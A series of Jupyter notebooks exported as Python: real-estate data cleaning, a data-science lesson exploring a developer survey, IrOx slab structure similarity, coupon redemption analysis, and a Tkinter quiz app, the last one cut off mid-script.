plt.hist(log_Price, bins = 100)
plt.title("Distribution of Property Price from 2020 to 2021 in Log Scale", fontsize = 13)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Property Price in Log Scale", fontsize = 12)
plt.tight_layout();
#plt.savefig("project2_images/histogram_LOG_property_price.png");
# -
# check missing values in Location
# print(len(df[df["Location"] == "—"]))
print(len(df[df["Location"] == ""]))
#191 missing values for location, but Zip Code can be used to approximate location!
# +
# check missing values in Beds and Baths
# print(len(df[df["Beds"] == ""]))
print(len(df[df["Beds"] == "—"])) #124 obs missing values in Beds
# print(len(df[df["Baths"] == ""]))
print(len(df[df["Baths"] == "—"])) #118 obs missing values in Baths
mask = (df["Beds"] == "—") & (df["Baths"] == "—")
print(len(df[mask])) #42 obs missing both Beds and Baths
# replace "—" in both Beds and Baths with none
df["Beds"].replace({"—":None}, inplace = True)
df["Baths"].replace({"—":None}, inplace = True)
# -
# convert Beds to integer and Baths to float
# int vs float makes a difference in interpretation
df["Beds"] = pd.to_numeric(df["Beds"]).astype("Int64")
df["Baths"] = pd.to_numeric(df["Baths"])
df[["Beds","Baths"]].describe()
df["Beds"].value_counts().sort_index()
df[df["Beds"] == 0] # properties that have no bedroom in the dataset are condos
df["Baths"].value_counts().sort_index() #there can be 0.25 and 0.75 baths...o.O
# Note: make sense to have 0 bed (in case of studio units), but always have >= 1 bath
# +
# look at distribution of property by number of bedrooms
Beds_noNA = df[df["Beds"].notnull()]["Beds"]
plt.hist(Beds_noNA, bins = 30)
plt.title("Property Distribution by Number of Beds", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Number of Beds", fontsize = 12);
# +
# check missing values in house size(Sq.Ft.)
# print(len(df[df["Sq.Ft."] == ""]))
print(len(df[df["Sq.Ft."] == "—"])) #269 obs missing values in size
# removing symbols in house size(Sq.Ft.) and replacing "—" with null
df["Sq.Ft."] = ["".join(s.split(",")) for s in df["Sq.Ft."]]
df["Sq.Ft."].replace({"—":None}, inplace = True)
# -
# convert size to numeric
df["Sq.Ft."] = pd.to_numeric(df["Sq.Ft."])
# df["Sq.Ft."].isna().sum()
# look at distribution of property by size
plt.hist(df["Sq.Ft."], bins = 30)
plt.title("Property Distribution by Size", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Size of Properties", fontsize = 12);
# check outliers in property size
df["Sq.Ft."].describe()
df[df["Sq.Ft."] == 0] #2 listings have size 0, redfin records reported by owners
# remove the two records with 0 size
mask = (df["Sq.Ft."] == 0)
df.drop(df[mask].index, inplace = True)
# +
# df[df["Sq.Ft."] > 10000]
# to make notebook display less cluttered
df[df["Sq.Ft."] > 10000].head()
# -
# size has right skewed distribution, log transform (approximately normal after transformation)
plt.hist(np.log(df["Sq.Ft."]), bins = 30)
plt.title("Property Size Distribution in Log Scale", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Log Size of Properties", fontsize = 12);
# +
# check missing values in HOA
# print(len(df[df["HOA"] == "—"]))
print(len(df[df["HOA"] == ""])) #13 missing value in HOA
df["HOA"].value_counts()
# turn HOA into numeric
df["HOA"] = ["".join(h.split("/")[0].strip("$").split(",")) for h in df["HOA"]]
df["HOA"].replace({"None":"0"}, inplace = True)
df["HOA"] = pd.to_numeric(df["HOA"])
#df["HOA"].value_counts()
# +
# check missing values in Year Built
# print(len(df[df["Year Built"] == ""]))
print(len(df[df["Year Built"] == "—"])) #48 missing values in Year Built
df["Year Built"].replace({"—":None}, inplace = True)
# convert Year Built to integers
df["Year Built"] = pd.to_numeric(df["Year Built"]).astype("Int64")
df["Year Built"].value_counts().sort_index(ascending = False)
df["Year Built"].isna().sum()
# -
# look at distribution of Year Built
YB_noNA = df[df["Year Built"].notnull()]["Year Built"]
plt.hist(YB_noNA, bins = 100)
plt.title("Property Distribution by Year Built", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Year Built", fontsize = 12);
# check missing values in Lot Size and Date Sold
# print(len(df[df["Lot Size"] == ""]))
print(len(df[df["Lot Size"] == "—"])) #503 missing values in LotSize, likely to be missing for condos
# +
# convert Date Sold to datetime object
df["Date Sold"] = pd.to_datetime(df["Date Sold"])
df["Date Sold"].value_counts().sort_index()
print(df["Date Sold"].value_counts())
print(len(df[df["Date Sold"] == "—"]))
print(len(df[df["Date Sold"] == ""])) #0 missing values in Date Sold, should divide in month and year
# -
# extract the year and month from Date Sold
df["year_sold"] = pd.DatetimeIndex(df["Date Sold"]).year
df["month_sold"] = pd.DatetimeIndex(df["Date Sold"]).month
df["month_sold"].value_counts()
# +
# number of properties sold in Jan 2020/2021
mask = (df["year_sold"] == 2020) & (df["month_sold"] == 1)
print(len(df[mask]))
mask = (df["year_sold"] == 2021) & (df["month_sold"] == 1)
print(len(df[mask]))
# +
# check missing values in Zip Code
print(len(df[df["Zip Code"] == "—"]))
print(len(df[df["Zip Code"] == ""])) #0 missing values in Zip Code, need to extract Zip Code from of the string
#extrac zip code from the string
df["Zip Code"] = [zip.split("-")[-1] for zip in df["Zip Code"]]
df["Zip Code"].value_counts()
# -
# one zip code (one listing) maps to Daly City, delete record
df.drop(df[df["Zip Code"] == "94014"].index, inplace = True)
df["prop_type"].value_counts()
df.info()
df.to_pickle("/Users/sarazzzz/Desktop/Metis/CAMP/Metis_project2/project2_data/prop_cleaned_r1")
|
MetisP2_cleaning_EDA1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#
#
#
#
#
#
#
# <h2 id='part1'>A Look at the Data</h2>
#
# In order to get a better understanding of the data we will be looking at throughout this lesson, let's take a look at some of the characteristics of the dataset.
#
# First, let's read in the data and necessary libraries.
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import ALookAtTheData as t
# %matplotlib inline
df = pd.read_csv('./survey_results_public.csv')
df.head()
# -
# As you work through the notebook(s) in this and future parts of this program, you will see some consistency in how to test your solutions to assure they match what we acheived! In every environment, there is a solution file and a test file. There will be checks for each solution built into each notebook, but if you get stuck, you may also open the solution notebook to see how we find any of the solutions. Let's take a look at an example.
#
# <h3 id='q1'>Question 1</h3>
#
# **1.** Provide the number of rows and columns in this dataset.
# +
# We solved this one for you by providing the number of rows and columns:
# You can see how we are prompted that we solved for the number of rows and cols correctly!
num_rows = df.shape[0] #Provide the number of rows in the dataset
num_cols = df.shape[1] #Provide the number of columns in the dataset
t.check_rows_cols(num_rows, num_cols)
# +
# If we made a mistake - a different prompt will appear
flipped_num_rows = df.shape[1] #Provide the number of rows in the dataset
flipped_num_cols = df.shape[0] #Provide the number of columns in the dataset
t.check_rows_cols(flipped_num_rows, flipped_num_cols)
# +
# If you want to know more about what the test function is expecting,
# you can read the documentation the same way as any other funtion
# t.check_rows_cols?
# -
# Now that you are familiar with how to test your code - let's have you answer your first question:
#
# ### Question 2
#
# **2.** Which columns had no missing values? Provide a set of column names that have no missing values.
# +
no_nulls = set(df.columns[df.isnull().mean()==0])#Provide a set of columns with 0 missing values.
t.no_null_cols(no_nulls)
# -
# ### Question 3
#
# **3.** Which columns have the most missing values? Provide a set of column name that have more than 75% if their values missing.
# +
most_missing_cols = set(df.columns[df.isnull().mean() > 0.75])#Provide a set of columns with more than 75% of the values missing
t.most_missing_cols(most_missing_cols)
# -
# ### Question 4
#
# **4.** Provide a pandas series of the different **Professional** status values in the dataset. Store this pandas series in **status_vals**. If you are correct, you should see a bar chart of the proportion of individuals in each status.
# +
status_vals = df.Professional.value_counts()#Provide a pandas series of the counts for each Professional status
# The below should be a bar chart of the proportion of individuals in each professional category if your status_vals
# is set up correctly.
(status_vals/df.shape[0]).plot(kind="bar");
plt.title("What kind of developer are you?");
# -
# ### Question 5
#
# **5.** Provide a pandas series of the different **FormalEducation** status values in the dataset. Store this pandas series in **ed_vals**. If you are correct, you should see a bar chart of the proportion of individuals in each status.
# +
ed_vals = df.FormalEducation.value_counts()#Provide a pandas series of the counts for each FormalEducation status
# The below should be a bar chart of the proportion of individuals in your ed_vals
# if it is set up correctly.
(ed_vals/df.shape[0]).plot(kind="bar");
plt.title("Formal Education");
# -
# ### Question 6
#
# **6.** Provide a pandas series of the different **Country** values in the dataset. Store this pandas series in **count_vals**. If you are correct, you should see a bar chart of the proportion of individuals in each country.
# +
count_vals = df.Country.value_counts()#Provide a pandas series of the counts for each Country
# The below should be a bar chart of the proportion of the top 10 countries for the
# individuals in your count_vals if it is set up correctly.
(count_vals[:10]/df.shape[0]).plot(kind="bar");
plt.title("Country");
# -
# Feel free to explore the dataset further to gain additional familiarity with the columns and rows in the dataset. You will be working pretty closely with this dataset throughout this lesson.
pd.DataFrame(df.query("Professional == 'Professional developer' and (Gender == 'Male' or Gender == 'Female')").groupby(['Gender', 'FormalEducation']).mean()['Salary'])
|
Introduction to Data Science/A Look at the Data - Solution.ipynb
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:PROJ_irox_oer] *
# language: python
# name: conda-env-PROJ_irox_oer-py
# ---
# # Compute similarity of constructed *O IrOx slabs
# ---
# # Import Modules
# +
import os
print(os.getcwd())
import sys
import pickle
import numpy as np
import pandas as pd
# #########################################################
# from StructurePrototypeAnalysisPackage.ccf import struc2ccf
# from StructurePrototypeAnalysisPackage.ccf import struc2ccf, cal_ccf_d
from StructurePrototypeAnalysisPackage.ccf import cal_ccf_d
# #########################################################
from methods import get_df_slab
from methods import get_ccf
from methods import get_D_ij
from methods import get_identical_slabs
# #########################################################
# from local_methods import get_ccf
# from local_methods import get_D_ij
# from local_methods import get_identical_slabs
# -
# # Script Inputs
# +
verbose = True
r_cut_off = 10
r_vector = np.arange(1, 10, 0.02)
# -
# # Read Data
df_slab = get_df_slab()
# # TEMP | Filtering down `df_slab`
# +
# df_slab = df_slab[df_slab.bulk_id == "mjctxrx3zf"]
# df_slab = df_slab[df_slab.bulk_id == "64cg6j9any"]
# -
df_slab
df_slab = df_slab.sort_values(["bulk_id", "facet", ])
bulk_ids = [
"64cg6j9any",
"9573vicg7f",
"b19q9p6k72",
# "",
]
# df_slab = df_slab[
# df_slab.bulk_id.isin(bulk_ids)
# ]
# +
# assert False
# + active=""
#
#
# -
# # Looping through slabs and computing CCF
grouped = df_slab.groupby(["bulk_id"])
for bulk_id_i, group_i in grouped:
for slab_id_j, row_j in group_i.iterrows():
# #####################################################
slab_final_j = row_j.slab_final
# #####################################################
ccf_j = get_ccf(
slab_id=slab_id_j,
slab_final=slab_final_j,
r_cut_off=r_cut_off,
r_vector=r_vector,
verbose=False)
# # Constructing D_ij matrix
verbose_local = False
# #########################################################
data_dict_list = []
# #########################################################
grouped = df_slab.groupby(["bulk_id"])
for bulk_id_i, group_i in grouped:
# #####################################################
data_dict_i = dict()
# #####################################################
if verbose_local:
print("slab_id:", bulk_id_i)
D_ij = get_D_ij(group_i, slab_id=bulk_id_i)
ident_slab_pairs_i = get_identical_slabs(D_ij)
# print("ident_slab_pairs:", ident_slab_pairs_i)
ids_to_remove = []
for ident_pair_i in ident_slab_pairs_i:
# Checking if any id already added to `id_to_remove` is in a new pair
for i in ids_to_remove:
if i in ident_pair_i:
print("This case needs to be dealt with more carefully")
break
ident_pair_2 = np.sort(ident_pair_i)
ids_to_remove.append(ident_pair_2[0])
num_ids_to_remove = len(ids_to_remove)
if verbose_local:
print("ids_to_remove:", ids_to_remove)
# #####################################################
data_dict_i["bulk_id"] = bulk_id_i
data_dict_i["slab_ids_to_remove"] = ids_to_remove
data_dict_i["num_ids_to_remove"] = num_ids_to_remove
# #####################################################
data_dict_list.append(data_dict_i)
# #####################################################
# +
df_slab_simil = pd.DataFrame(data_dict_list)
df_slab_simil
# -
# Pickling data ###########################################
import os; import pickle
directory = os.path.join(
os.environ["PROJ_irox_oer"],
"workflow/creating_slabs/slab_similarity",
"out_data")
if not os.path.exists(directory): os.makedirs(directory)
with open(os.path.join(directory, "df_slab_simil.pickle"), "wb") as fle:
pickle.dump(df_slab_simil, fle)
# #########################################################
from methods import get_df_slab_simil
df_slab_simil = get_df_slab_simil()
df_slab_simil
assert False
# + active=""
#
#
#
# + jupyter={"source_hidden": true}
# ident_slab_pairs_i = [
# ['bimamuvo_42', 'hid<PASSWORD>ha_44'],
# ['legifipe_18', 'witepote_55'],
# ]
# ids_to_remove = []
# for ident_pair_i in ident_slab_pairs_i:
# # Checking if any id already added to `id_to_remove` is in a new pair
# for i in ids_to_remove:
# if i in ident_pair_i:
# print("This case needs to be dealt with more carefully")
# break
# ident_pair_2 = np.sort(ident_pair_i)
# ids_to_remove.append(ident_pair_2[0])
# + jupyter={"source_hidden": true}
# identical_pairs_list = [
# ["a", "b"],
# ["b", "a"],
# ["c", "d"],
# ]
# # identical_pairs_list_2 =
# # list(np.unique(
# # [np.sort(i) for i in identical_pairs_list]
# # ))
# np.unique(
# [np.sort(i) for i in identical_pairs_list]
# )
# + jupyter={"source_hidden": true}
# import itertools
# lst = identical_pairs_list
# lst.sort()
# lst = [list(np.sort(i)) for i in lst]
# identical_pairs_list_2 = list(lst for lst, _ in itertools.groupby(lst))
# + jupyter={"source_hidden": true}
# def get_identical_slabs(
# D_ij,
# min_thresh=1e-5,
# ):
# """
# """
# #| - get_identical_slabs
# # #########################################################
# # min_thresh = 1e-5
# # #########################################################
# identical_pairs_list = []
# for slab_id_i in D_ij.index:
# for slab_id_j in D_ij.index:
# if slab_id_i == slab_id_j:
# continue
# if slab_id_i == slab_id_j:
# print("Not good if this is printed")
# d_ij = D_ij.loc[slab_id_i, slab_id_j]
# if d_ij < min_thresh:
# # print(slab_id_i, slab_id_j)
# identical_pairs_list.append((slab_id_i, slab_id_j))
# # #########################################################
# identical_pairs_list_2 = list(np.unique(
# [np.sort(i) for i in identical_pairs_list]
# ))
# return(identical_pairs_list_2)
# #__|
# + jupyter={"source_hidden": true}
# # #########################################################
# import pickle; import os
# path_i = os.path.join(
# os.environ["PROJ_irox_oer"],
# "workflow/creating_slabs/slab_similarity",
# "out_data/df_slab_simil.pickle")
# with open(path_i, "rb") as fle:
# df_slab_simil = pickle.load(fle)
# # #########################################################
# + jupyter={"source_hidden": true}
# /home/raulf2012/Dropbox/01_norskov/00_git_repos/PROJ_IrOx_OER/workflow/creating_slabs/slab_similarity
# workflow/creating_slabs/slab_similarity
|
workflow/creating_slabs/slab_similarity/slab_similarity.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import math
import re
from datetime import datetime
import warnings
warnings.filterwarnings("ignore")
# ### Online and Offline Training data
# +
df_on = pd.read_csv('DataSets/ccf_online_stage1_train.csv')
df_off = pd.read_csv('DataSets/ccf_offline_stage1_train.csv')
# -
print("Online Training Data Sample\nShape:"+str(df_on.shape))
df_on.head()
print("Offline Training Data Sample\nShape:"+str(df_off.shape))
df_off.head()
# ### TEST DATA (OFFLINE)
df_test = pd.read_csv('DataSets/ccf_offline_stage1_test_revised.csv')
print("Testing Data(Offline) Sample\nShape:"+str(df_test.shape))
df_test.head()
# ### Converting Coupon to String type
# +
print('Data type of coupon in different datasets\nOnline: '+str(df_on['Coupon_id'].dtypes)+'\nOffline: '+
str(df_off['Coupon_id'].dtypes))
df_off['Coupon_id'] = [int(i) if i==i else i for i in df_off['Coupon_id']]
df_off['Coupon_id'] = df_off['Coupon_id'].apply(lambda x: "{:.0f}".
format(x) if not pd.isnull(x) else x)
print('After conversion, data type of coupon in different datasets\nOnline: '+str(df_on['Coupon_id'].dtypes)+'\nOffline: '+
str(df_off['Coupon_id'].dtypes))
# -
# #### Converting Date to DateTime format
# +
#Online Training Data
df_on['Date'] = pd.to_datetime(df_on["Date"],format='%Y%m%d')
df_on['Date_received'] = pd.to_datetime(df_on["Date_received"],format='%Y%m%d')
#Offline Training Data
df_off['Date'] = pd.to_datetime(df_off["Date"],format='%Y%m%d')
df_off['Date_received'] = pd.to_datetime(df_off["Date_received"],format='%Y%m%d')
# -
# ### Removing Duplicates from Online and Offline Training Data
# +
#Removing duplicates and giving frequency counts(Count) to each row
#Online
x = 'g8h.|$hTdo+jC9^@'
df_on_unique = (df_on.fillna(x).groupby(['User_id', 'Merchant_id', 'Action', 'Coupon_id', 'Discount_rate',
'Date_received', 'Date']).size().reset_index()
.rename(columns={0 : 'Count'}).replace(x,np.NaN))
df_on_unique["Date_received"]=pd.to_datetime(df_on_unique["Date_received"])
df_on_unique["Date"]=pd.to_datetime(df_on_unique["Date"])
print("Online Training Data Shape:"+str(df_on_unique.shape))
# +
#Offline
x = 'g8h.|$hTdo+jC9^@' #garbage value for nan values
df_off_unique = (df_off.fillna(x).groupby(['User_id', 'Merchant_id', 'Coupon_id', 'Discount_rate', 'Distance',
'Date_received', 'Date']).size().reset_index()
.rename(columns={0 : 'Count'}).replace(x,np.NaN))
df_off_unique["Date_received"]=pd.to_datetime(df_off_unique["Date_received"])
df_off_unique["Date"]=pd.to_datetime(df_off_unique["Date"])
print("Offline Training Data Shape:"+str(df_off_unique.shape))
# -
# #### Filling Nan for Distance (OFFLINE)
df_off_unique['Distance'].fillna(df_off_unique['Distance'].mean(), inplace=True)
df_off_unique['Distance'] = df_off_unique.Distance.astype(int)
# ### Converting Discount Ratio to Rate
# +
#Funtion to convert discount ratio to discount rate
def convert_discount(discount):
values = []
for i in discount:
if ':' in i:
i = i.split(':')
rate = round((int(i[0]) - int(i[1]))/int(i[0]),3)
values.append([int(i[0]),int(i[1]),rate])
elif '.' in i:
i = float(i)
x = 100*i
values.append([100,int(100-x),i])
discounts = dict(zip(discount,values))
return discounts
# convert_discount(list(df_of['Discount_rate']))
# -
#ONLINE DATA
df_on_coupon = df_on_unique[(df_on_unique['Coupon_id'].isna()==False) & (df_on_unique['Coupon_id']!='fixed')]
discounts_online = list(df_on_coupon['Discount_rate'].unique())
df_on_coupon.loc[:,('Discount')] = df_on_coupon.loc[:,('Discount_rate')]
df_on_coupon.loc[:,('Discount_rate')] = df_on_coupon[df_on_coupon['Coupon_id']!='fixed'].loc[:,('Discount')].map(convert_discount(discounts_online))
df_on_coupon[['Original_price','Discounted_price','Rate']] = pd.DataFrame(df_on_coupon['Discount_rate'].values.tolist(), index= df_on_coupon.index)
df_on_coupon.head()
df_on_coupon = df_on_coupon.append(df_on_unique[df_on_unique['Coupon_id']=='fixed'], sort=False)
df_on_coupon.shape, df_on_unique[df_on_unique['Coupon_id'].isna()==False].shape
#OFFLINE DATA
df_off_coupon = df_off_unique[(df_off_unique['Coupon_id'].isna()==False)].copy()
discounts_offline = list(df_off_coupon['Discount_rate'].unique())
df_off_coupon.loc[:,('Discount')] = df_off_coupon.loc[:,('Discount_rate')]
df_off_coupon['Discount_rate'] = df_off_coupon['Discount'].map(convert_discount(discounts_offline))
df_off_coupon[['Original_price','Discounted_price','Rate']] = pd.DataFrame(df_off_coupon.Discount_rate.values.tolist(), index= df_off_coupon.index)
df_off_coupon.head()
# ### Training Data (Online + Offline)
df_train = df_on_unique.append(df_off_unique, sort=False)
df_train = df_train.sort_values(by = ['User_id'] )
df_train = df_train.reset_index()
del df_train['index']
print("Training Data(Offline+Online) \nShape:"+str(df_train.shape))
df_train.head()
# ### Distributing users into three categores:
# 1. users getting coupon
# 2. users making purchases without coupon
# 3. users making purchases with coupon
df_off_redeem_coupon = df_off_unique[(df_off_unique['Date'].isna()==False) & (df_off_unique['Coupon_id'].isna()==False)]
df_on_redeem_coupon = df_on_unique[(df_on_unique['Date'].isna()==False) & (df_on_unique['Coupon_id'].isna()==False)]
df_train_coupon = df_on_coupon.append(df_off_coupon, sort=False)
# ## Coupon Analysis
# ## Coupon Distribution for Online, Offline and Test Datasets
coupon_off = set(df_off['Coupon_id'].unique())
coupon_on = set(df_on['Coupon_id'].unique())
coupon_test = set(df_test['Coupon_id'].unique())
len(coupon_off),len(coupon_on),len(coupon_test)
coupon_on_off = coupon_on.intersection(coupon_off)
coupon_on_test = coupon_on.intersection(coupon_test)
coupon_test_off = coupon_test.intersection(coupon_off)
len(coupon_on_off), len(coupon_on_test), len(coupon_test_off)
coupon_only_off = coupon_off - coupon_test
coupon_only_test = coupon_test - coupon_off
len(coupon_only_off),len(coupon_only_test)
# <img src ="imgs/CouponDistribution.png" width="60%">
# ### Merchant is constant for a particular Coupon ID
coupon_merchant = pd.DataFrame(df_train_coupon.groupby(['Coupon_id'])['Merchant_id'].nunique())
coupon_merchant.columns = ['NumberOfMerchants']
coupon_merchant['NumberOfMerchants'].nunique()
# ### Discount Rate is constant for a particular Coupon ID
coupon_discount = pd.DataFrame(df_train_coupon.groupby(['Coupon_id'])['Rate'].nunique())
coupon_discount.columns = ['NumberOfDiscounts']
coupon_discount['NumberOfDiscounts'].nunique()
# ### Coupon Redemption Score
#Coupon in offline Dataset
coupon_redemption = pd.DataFrame(df_train_coupon.groupby(['Coupon_id'])['Date_received','Date'].count()).reset_index()
coupon_redemption.columns = ['Coupon_id','Coupon_Released', 'Coupon_Redeemed']
coupon_redemption['Coupon_Ratio'] = round(coupon_redemption['Coupon_Redeemed']/coupon_redemption['Coupon_Released'],2)
coupon_redemption.head()
plt.figure(figsize=(8,5))
sns.distplot(coupon_redemption['Coupon_Ratio'],kde=False,bins=26)
plt.xlabel('Coupon Redemption Ratio')
plt.ylabel('Count of Coupon')
plt.title('Coupon Redemption Score Distribution (OFFLINE)')
plt.show()
# ### Distance Distribution with respect to coupon redemption
plt.figure(figsize=(9,7))
ax = sns.countplot(df_off_redeem_coupon['Distance'])
ax.set_xticklabels(ax.get_xticklabels(),rotation=90)
for p in ax.patches:
ax.annotate('{:.0f}'.format(p.get_height()), (p.get_x()+0.1, p.get_height()+50))
plt.xlabel('Distance between users and merchants')
plt.ylabel('Count of Coupon Redeemed for that discount')
plt.title('Coupon Redemption and the Distance of User')
plt.show()
# ### Duration of coupon
coupon_duration = df_train_coupon.copy()
coupon_duration['DateTrack'] = coupon_duration['Date']
coupon_duration.DateTrack.fillna(coupon_duration.Date_received, inplace=True)
coupon_duration.head()
coupon_duration_days =pd.DataFrame(coupon_duration.groupby(['Coupon_id'])['DateTrack'].agg(['min','max'])).reset_index()
coupon_duration_days.columns = ['Coupon_id','StartDate', 'EndDate']
coupon_duration_days['Duration'] = coupon_duration_days['EndDate'] - coupon_duration_days['StartDate']
coupon_duration_days.head()
coupon_duration_days['Duration'] = coupon_duration_days['Duration'].dt.days.astype('str')
coupon_duration_days['Duration'] = pd.to_numeric(coupon_duration_days['Duration'],errors="coerce")
coupon_duration_days.head()
plt.figure(figsize=(8,5))
ax = sns.distplot(coupon_duration_days['Duration'],kde=False,bins=26)
plt.xlabel('Active Duration of Coupons(days)')
plt.ylabel('Count of Coupons')
plt.title('Coupon and their Duration time(days)')
for p in ax.patches:
ax.annotate('{:.0f}'.format(p.get_height()), (p.get_x()+0.1, p.get_height()+50))
coupon_duration_days['Duration'].describe()
# ## Coupon and its redemption list
coupon_days = df_train_coupon[df_train_coupon['Date'].isna()==False]
coupon_days['First_day'] = pd.to_datetime('20160101',format='%Y%m%d')
coupon_days['DayNum'] = coupon_days['Date'] - coupon_days['First_day']
coupon_days['DayNum'] = coupon_days['DayNum'].dt.days.astype('str')
coupon_days['DayNum'] = pd.to_numeric(coupon_days['DayNum'],errors="coerce") + 1
coupon_days.head()
coupon_days = pd.DataFrame(coupon_days.groupby(['Coupon_id'])['DayNum'].apply(list).reset_index(name='RedemptionList'))
coupon_days['RedemptionList'] = coupon_days['RedemptionList'].apply(lambda x : sorted(set(x)))
coupon_days
# ## Coupon Level Features
coupon_redemption
# +
coupon_level_data = coupon_redemption.merge(coupon_duration_days,how='left',on='Coupon_id')
coupon_level_data = coupon_level_data.drop(columns=['StartDate','EndDate'])
#Coupon Redemtion day list
coupon_level_data = pd.merge(coupon_level_data,coupon_days,how='left',on='Coupon_id')
for row in coupon_level_data.loc[coupon_level_data.RedemptionList.isnull(), 'RedemptionList'].index:
coupon_level_data.at[row, 'RedemptionList'] = []
coupon_level_data
# -
coupon_level_data.to_csv('DataSets/DatasetsCreated/coupon_level.csv',index=False)
coupon_level_data.isna().sum()
coupon_level_data.shape
df_train['Coupon_id'].nunique()
coupon_level_data[coupon_level_data['Coupon_id']=='fixed']
|
Approach2/CouponLevelAnalysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # <font color='slateblue'><center>GUI QUIZ GAME APP</center></font>
# # Problem Statement
# - This is a standard quiz application that presents a questionnaire to the user, and allows them to answer the same, and displays the correct answer if they are wrong.
#
# - We will be developing a simple multiple-choice quiz in python with GUI using Tkinter.
# - Each test will display the final score of the user.
#
# - The application will have an account creation option, wherein some users can be appointed as Admins
# ## Importing required Libraries
from tkinter import * # tkinter library to show GUI screen of quiz.
from base64 import b64decode # base64 library is used to decode json file.
import io # io library to manage file related input output.
import json # json library to load json files.
from tkinter import messagebox as mb # messagebox is used to display result of quiz.
# ## Uploading JSON Data File
# +
# base_file contains encoded json file.
base_file = "<KEY>
# io_file contains Bytes.IO file after decoding base_file.
io_file = io.BytesIO(b64decode(base_file))
# json_file contains bytes file decoded using io_file.
json_file = io_file.getvalue()
# data_file contains json output file as a dictionary.
data_file = json.loads(json_file)
# -
# ## QUIZ GAME Program
# +
# Class Quiz_Question which contains methods to check answers, displaying quiz UI, and buttons for quit and next.
# a class to define the components of the GUI
class quiz_question:
# Constructor of class quiz_question which sets the question count to 0, and initialize all the
# other methoods to display the content and make all the functionalities available.
def __init__(self):
'''Constructor method'''
# initially, set question number to 0
self.question_no=0
# function to display title of quiz .
self.title_function()
# function assigns question to the display_question function to update later.
self.display_question()
# function to store selected option as integer value
self.select_opt=IntVar()
# function to display radio button for the current question
self.options=self.radio_button()
# function to display options for the current question
self.display_options()
# function to display the button for next and quit.
self.buttons()
# no of questions
self.data_size=len(questions_file)
# keep a counter of correct answers
self.correct_ans=0
# This method is used to Display Title of GUI Screen
def title_function(self):
'''Displaying Title of QUIZ'''
# title to be shown
title = Label(gui, text="QUIZ APP", width=50, bg="magenta",fg="white", font=("ariel", 20, "bold"))
# place of the title
title.place(x=0, y=2)
# This method shows the current Question on the screen
def display_question(self):
'''Function to display questions'''
# setting the Question properties
question_no_label = Label(gui, text=question[self.question_no], width=60, font=('ariel' ,16, 'bold'), anchor= 'w' )
#placing the option on the screen
question_no_label.place(x=70, y=100)
# This method displays options and clear them everytime before displaying next question
def display_options(self):
'''Function to display options for questions'''
val=0
# deselecting the options
self.select_opt.set(0)
# looping over the options to be displayed for the text of the radio buttons.
for option in options[self.question_no]:
self.options[val]['text']=option
val+=1
# This method is used to display the result and display correct and wrong answers
def display_result(self):
'''Function to display result after end of quiz'''
# to calculate the wrong answers count and correct answers count.
wrong_count = self.data_size - self.correct_ans
correct = f"Correct: {self.correct_ans}"
wrong = f"Wrong: {wrong_count}"
# calculate the percentage of correct answers
score = int(self.correct_ans / self.data_size * 100)
result = f"Score: {score}%"
# Shows a message box to display the result
mb.showinfo("Result", f"{result}\n{correct}\n{wrong}")
# This method checks the Answer after we click on Next.
def check_ans(self, question_no):
'''To check correct answers'''
# checks for if the selected option is correct
if self.select_opt.get() == answer[question_no]:
# if the option is correct it return true
return True
# Method to check answer of question to increment correct answer count.
# On pressing next button, it shows next question with options.
# On last question, it shows result of quiz.
def check_button_function(self):
'''to check which button to call'''
# Check if the answer is correct and if the answer is correct it increments the correct by 1
if self.check_ans(self.question_no):
self.correct_ans += 1
# Move to next Question by incrementing the question_no counter
self.question_no += 1
# to check if the question_no size is equal to the data size
# if it is correct then it displays the score
if self.question_no==self.data_size:
end_button = Button(gui, text="QUIZ ENDED",command=self.check_button_function, width=10,bg="teal",fg="white",font=("ariel",16,"bold"))
end_button.place(x=350,y=380)
self.display_result()
# destroys the GUI screen
gui.destroy()
# shows the next question
else:
self.display_question()
self.display_options()
# This method shows the two buttons on the screen.
# The first one is the next_button which moves to next question
# The second button is the exit button which is used to close the GUI without completing the quiz.
def buttons(self):
'''To show next and quit buttons'''
# The first button is the Next button to move to the next Question
next_button = Button(gui, text="NEXT",command=self.check_button_function,
width=10,bg="teal",fg="white",font=("ariel",16,"bold"))
# palcing the button on the screen
next_button.place(x=350,y=380)
# This is the second button which is used to Quit the GUI
quit_button = Button(gui, text="QUIT", command=gui.destroy, width=5,bg="red", fg="white",font=("ariel",16," bold"))
# placing the Quit button on the screen
quit_button.place(x=700,y=50)
# To display radio buttons at specified position
def radio_button(self):
'''Function to display radio buttons'''
# initialize the list with an empty list of options
q_list = []
# position of the first option
y_pos = 150
# adding the options to the list
while len(q_list) < 4:
# setting the radio button properties
radio_btn = Radiobutton(gui,text=" ",variable=self.select_opt, value = len(q_list)+1,font = ("ariel",14))
# adding the button to the list
q_list.append(radio_btn)
# placing the button
radio_btn.place(x = 100, y = y_pos)
# incrementing the y-axis position by 40
y_pos += 40
# return the radio buttons
return q_list
# To create a GUI Window for Quiz Game
gui = Tk()
# set the size of the GUI Window
gui.geometry("800x450")
# set the title of the Window
gui.title("GUI Quiz App")
# to set background color of window
gui.configure(bg='azure')
# get the data from the json file
# set the question, options, and answer files
questions_file = data_file['question']
options_file = data_file['options']
answers_file = data_file['answer']
# create an object of the Quiz_Question Class.
